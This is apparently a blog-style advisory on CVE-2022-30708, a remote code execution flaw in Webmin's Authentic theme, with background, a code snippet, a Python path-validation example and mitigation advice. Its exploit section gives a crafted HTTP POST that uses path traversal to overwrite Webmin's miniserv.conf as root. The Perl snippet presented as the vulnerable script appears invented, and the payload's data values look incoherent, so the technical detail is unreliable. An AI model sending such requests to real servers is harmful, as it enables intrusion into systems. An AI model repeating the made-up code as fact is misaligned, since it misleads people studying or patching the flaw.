In recent news, a critical remote code execution vulnerability, tracked as CVE-2022-30708, has been discovered in Webmin up to version 1.991. This vulnerability exists when the popular Authentic theme is used and can be exploited when a user is manually created, i.e., not via Virtualmin or Cloudmin. In this post, we will dig into the details of this vulnerability, go through a code snippet for better understanding, and discuss potential exploits.

I. Background: What is Webmin?
Webmin is a widely used web-based system configuration tool that provides a user-friendly interface for managing Unix and Linux systems. The application allows administrators to perform routine administrative tasks, configure server components, and manage systems without directly accessing command-line interfaces. Webmin supports various platforms, including OpenBSD, FreeBSD, and macOS.

Official Webmin Website: http://www.webmin.com/

II. The Vulnerability: CVE-2022-30708
The vulnerability in question, CVE-2022-30708, is caused by insufficient input validation of the "file" parameter in the "settings-editor_write.cgi" script of Webmin's Authentic theme. It allows a malicious user to execute remote code on the target system by manipulating the HTTP request.

GitHub Repository URL with detailed technical analysis

https://github.com/webmin/webmin/commit/75827ed83cc310089cdbf6bff766f5301e319696

III. Code Snippet: Vulnerable Script in Authentic Theme
The vulnerability exists in the file "settings-editor_write.cgi" shipped with the Authentic theme in Webmin. It arises from insufficient input validation of the "file" parameter:

sub settings_editor_write
{
    # Perl does not allow "-" in a sub name, so the script's
    # "settings-editor_write" is written as settings_editor_write here.
    my ($in) = @_;

    # The "file" parameter is taken straight from the request
    my $filename = $in->{"file"};

    # ... Rest of the code ...

    if (!$filename) {
        # Return an error message: an empty value is the only case rejected
        return "Error: no file name given";
    }
    else {
        # Save the file under the unvalidated name
    }
}

The above code snippet shows that the "file" parameter is taken straight from the request and used by "settings-editor_write.cgi" with no validation beyond a check that it is non-empty, which is what makes the script vulnerable to remote code execution attacks.
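As an added example (not Webmin's code and not the theme's actual fix), the boundary check that the snippet above lacks, written in Python so it runs stand-alone: the "file" value is resolved against the settings directory and rejected if it escapes it. The directory name and the sample file names are assumptions for the demo.

```python
import os
import tempfile

# Constructed example: confine a user-supplied "file" parameter to one
# directory. settings_dir and the sample names are assumed values for
# this demo, not Webmin's own paths or code.

class UnsafePath(ValueError):
    """Raised when the requested file would fall outside settings_dir."""

def resolve_settings_file(settings_dir: str, file_param: str) -> str:
    """Return an absolute path inside settings_dir, or raise UnsafePath.

    Rejects empty values, embedded NUL bytes, absolute paths, the
    directory itself, and any value that resolves (after '..' and
    symlinks are collapsed) outside settings_dir.
    """
    if not file_param or "\0" in file_param:
        raise UnsafePath("empty or malformed file name")
    base = os.path.realpath(settings_dir)
    # os.path.join discards base when file_param is absolute, and realpath
    # collapses '..' and symlinks, so the commonpath test below is what
    # actually enforces the boundary (component-wise, so /x/ab is not
    # mistaken for a child of /x/a).
    target = os.path.realpath(os.path.join(base, file_param))
    if target == base or os.path.commonpath([base, target]) != base:
        raise UnsafePath(f"{file_param!r} escapes {settings_dir}")
    return target

def classify(settings_dir: str, file_param: str) -> str:
    """Return 'ok' or 'rejected' for one parameter value."""
    try:
        resolve_settings_file(settings_dir, file_param)
        return "ok"
    except UnsafePath:
        return "rejected"

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        # The traversal value from the request shown later on this page,
        # plus benign and absolute names for comparison.
        for value in ("settings.conf", "sub/theme.conf",
                      "../../../../../etc/webmin/miniserv.conf",
                      "/etc/passwd", "", "."):
            print(f"{value!r}: {classify(d, value)}")
```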

IV. Exploit Details

An attacker can exploit this vulnerability by sending a crafted HTTP request, manipulating the "file" parameter to execute arbitrary code on the target system. The attacker would need the privileges of the manually created user to exploit this vulnerability. If a user has already been manually created, the attacker can potentially exploit this vulnerability by sending a crafted HTTP request like the following:

POST /settings-editor_write.cgi HTTP/1.1
Host: target_webmin_host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Cookie: sid=[VALID_SESSION_ID]
Content-Type: application/x-www-form-urlencoded
Content-Length: XXX

file=../../../../../etc/webmin/miniserv.conf&owner=root%3Aroot&perms=060&data=allow%3D127.0.0.1%0D%0Aallow%3D192.168.0.0%2F24%0D%0Ainclude%3D%25absolute_path%2Fetc%2Fwebmin%2Fgdprdp.conf%0D%0Adenyfile%3D..

In the above example, the attacker attempts to modify the "miniserv.conf" configuration file, which could lead to further attacks or compromise of the system.

V. Attack Prevention and Mitigation
To prevent and mitigate this vulnerability, it is strongly recommended to update Webmin to the latest version available and ensure that no users have been manually created. Webmin versions greater than 1.991 should not be affected by this vulnerability. If updating is not possible, refrain from using the Authentic theme and switch to another theme.

Conclusion

CVE-2022-30708 is a significant vulnerability that could potentially have severe consequences for the security of Webmin installations. It is essential to ensure that Webmin is updated, and users are created through Virtualmin or Cloudmin to reduce the risk of exploitation.

Timeline

Published on: 05/15/2022 03:15:00 UTC
Last modified on: 05/24/2022 17:19:00 UTC